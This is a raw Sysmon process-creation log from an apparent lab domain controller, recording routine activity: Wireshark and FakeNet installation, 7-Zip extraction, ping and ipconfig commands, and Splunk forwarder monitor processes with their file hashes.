154100x800000000000000029544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:58.912{A8622C2F-46DE-6078-E705-00000000AE01}6412C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping google.comC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000029523Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:54.454{A8622C2F-46DA-6078-E605-00000000AE01}6212C:\Windows\System32\doskey.exe10.0.14393.0 (rs1_release.160715-1616)Keyboard History UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationDOSKEY.EXEdoskey git="C:\Program Files\Git\cmd\git.exe" $*C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=56BC572C8305144F4C498ABB7E8160A2,SHA256=DBF2E1E11FD57DD0FBB2ACCB08778E6D838F272B3D5E814260044F0B0866B5A1,IMPHASH=61FF284E1DB21B573CA96D1E4D227F1D{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000029514Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:54.444{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" 
$*"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-46DA-6078-E305-00000000AE01}7012C:\Program Files\Git\git-cmd.exe"C:\Program Files\Git\git-cmd.exe" --cd-to-home 154100x800000000000000029473Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:54.359{A8622C2F-46DA-6078-E305-00000000AE01}7012C:\Program Files\Git\git-cmd.exe-Git for WindowsGitThe Git Development Communitygit.exe"C:\Program Files\Git\git-cmd.exe" --cd-to-homeC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=074A5973A6AD7B0FCD40831B00CA73BC,SHA256=F355A348123EB661704BAA5D30E3B37D5ADB0395EC33D7DA1A5CFEE3076EB3DF,IMPHASH=24812CA2A2E2DEB2BDB6B6C8878A2C71{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000029327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:36.910{A8622C2F-46C8-6078-E005-00000000AE01}5640C:\Windows\SysWOW64\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeipconfig /flushdnsC:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D99377A3CC218A71E27DFA4C6C4892A4,SHA256=5F2FF9DFA80DCBAE0301500B50F5BB10DDA257BE9C061B3CFCC9BA3C1FBC8891,IMPHASH=9CB4975E5FC345BA48C788102C18C1A6{A8622C2F-46C7-6078-DE05-00000000AE01}6456C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" 154100x800000000000000029213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:59:35.418{A8622C2F-46C7-6078-DE05-00000000AE01}6456C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe-----"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7DE393B4286292CF72FC087FA193771D,SHA256=489486CC2F68D1CDEC3A47A35EE7653CB1F13F8E7EB73C5FCD925F162FB92FCD,IMPHASH=6FAFEF2A4DE5987BE20D8FCCBBBCA571{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000029144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:23.326{A8622C2F-46BB-6078-DA05-00000000AE01}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:21.969{A8622C2F-46B9-6078-D905-00000000AE01}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029121Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:21.301{A8622C2F-46B9-6078-D805-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:20.254{A8622C2F-46B8-6078-D705-00000000AE01}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:18.473{A8622C2F-46B6-6078-D605-00000000AE01}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:17.883{A8622C2F-46B5-6078-D405-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:17.154{A8622C2F-46B5-6078-D305-00000000AE01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000027212Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:11.241{A8622C2F-46AF-6078-D205-00000000AE01}6248C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Administrator\Downloads\Fakenet1.0c\" -spe -an -ai#7zMap6436:100:7zEvent29311C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000026283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:02.468{A8622C2F-46A6-6078-D005-00000000AE01}4672C:\Windows\Temp\{9566FD17-4228-44D3-8E7A-F53C5A390B29}\.be\VC_redist.x64.exe14.28.29910.0Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft CorporationVC_redist.x64.exe"C:\Windows\Temp\{9566FD17-4228-44D3-8E7A-F53C5A390B29}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9CF6F77D-BF9D-42EA-9A23-39332541F87E} {59E6ACF4-BF94-45EA-9947-D0C673B39B89} 4420C:\Program Files\Wireshark\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C27046BD35C5717084BB40C7305B941A,SHA256=E0BC82C13BCD1ADE084A0421DAB88E23E9CC5499323449E585E7DD2116951BD3,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2{A8622C2F-46A5-6078-CF05-00000000AE01}4420C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe"C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Program Files\Wireshark\vcredist_x64.exe" -burn.filehandle.attached=580 -burn.filehandle.self=588 /install /quiet /norestart 154100x800000000000000026245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:59:01.750{A8622C2F-46A5-6078-CF05-00000000AE01}4420C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe14.28.29910.0Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft CorporationVC_redist.x64.exe"C:\Windows\Temp\{51B57D1C-AA70-4954-AF83-9720F9A809F6}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Program Files\Wireshark\vcredist_x64.exe" -burn.filehandle.attached=580 -burn.filehandle.self=588 /install /quiet /norestartC:\Program Files\Wireshark\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C27046BD35C5717084BB40C7305B941A,SHA256=E0BC82C13BCD1ADE084A0421DAB88E23E9CC5499323449E585E7DD2116951BD3,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2{A8622C2F-46A5-6078-CE05-00000000AE01}3908C:\Program Files\Wireshark\vcredist_x64.exe"C:\Program Files\Wireshark\vcredist_x64.exe" /install /quiet /norestart 154100x800000000000000026235Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:01.245{A8622C2F-46A5-6078-CE05-00000000AE01}3908C:\Program Files\Wireshark\vcredist_x64.exe14.28.29910.0Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29910Microsoft CorporationVC_redist.x64.exe"C:\Program Files\Wireshark\vcredist_x64.exe" /install /quiet /norestartC:\Program Files\Wireshark\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D93387DF353336FA182BB57FBA94F4D3,SHA256=F299953673DE262FEFAD9DD19BFBE6A5725A03AE733BEBFEC856F1306F79C9F7,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2{A8622C2F-4696-6078-CD05-00000000AE01}6368C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe"C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe" 154100x800000000000000026006Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:58:46.431{A8622C2F-4696-6078-CD05-00000000AE01}6368C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe3.4.4.0Wireshark installer for 64-bit WindowsWiresharkWireshark development team-"C:\Users\Administrator\Downloads\Wireshark-win64-3.4.4.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=81F52F160CEDFBE0AFDD5FE936AC0BE1,SHA256=568D5B3F7DCCA301D4F4069B72FD458CD6FB9562C4F06227CCB2A1804B260B26,IMPHASH=C05041E01F84E1CCCA9C4451F3B6A383{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000025859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:23.353{A8622C2F-467F-6078-CC05-00000000AE01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:21.971{A8622C2F-467D-6078-CB05-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025826Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:21.304{A8622C2F-467D-6078-CA05-00000000AE01}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025815Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:20.266{A8622C2F-467C-6078-C905-00000000AE01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025795Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:18.499{A8622C2F-467A-6078-C805-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:17.881{A8622C2F-4679-6078-C705-00000000AE01}5168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025775Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:58:17.147{A8622C2F-4679-6078-C605-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000025357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:23.349{A8622C2F-4643-6078-C405-00000000AE01}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:21.958{A8622C2F-4641-6078-C305-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:21.287{A8622C2F-4641-6078-C205-00000000AE01}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025312Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:20.255{A8622C2F-4640-6078-C105-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025300Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:18.693{A8622C2F-463E-6078-C005-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:57:18.021{A8622C2F-463E-6078-BF05-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025272Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:17.130{A8622C2F-463D-6078-BE05-00000000AE01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000025125Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:57:08.953{A8622C2F-4634-6078-BD05-00000000AE01}3916C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x 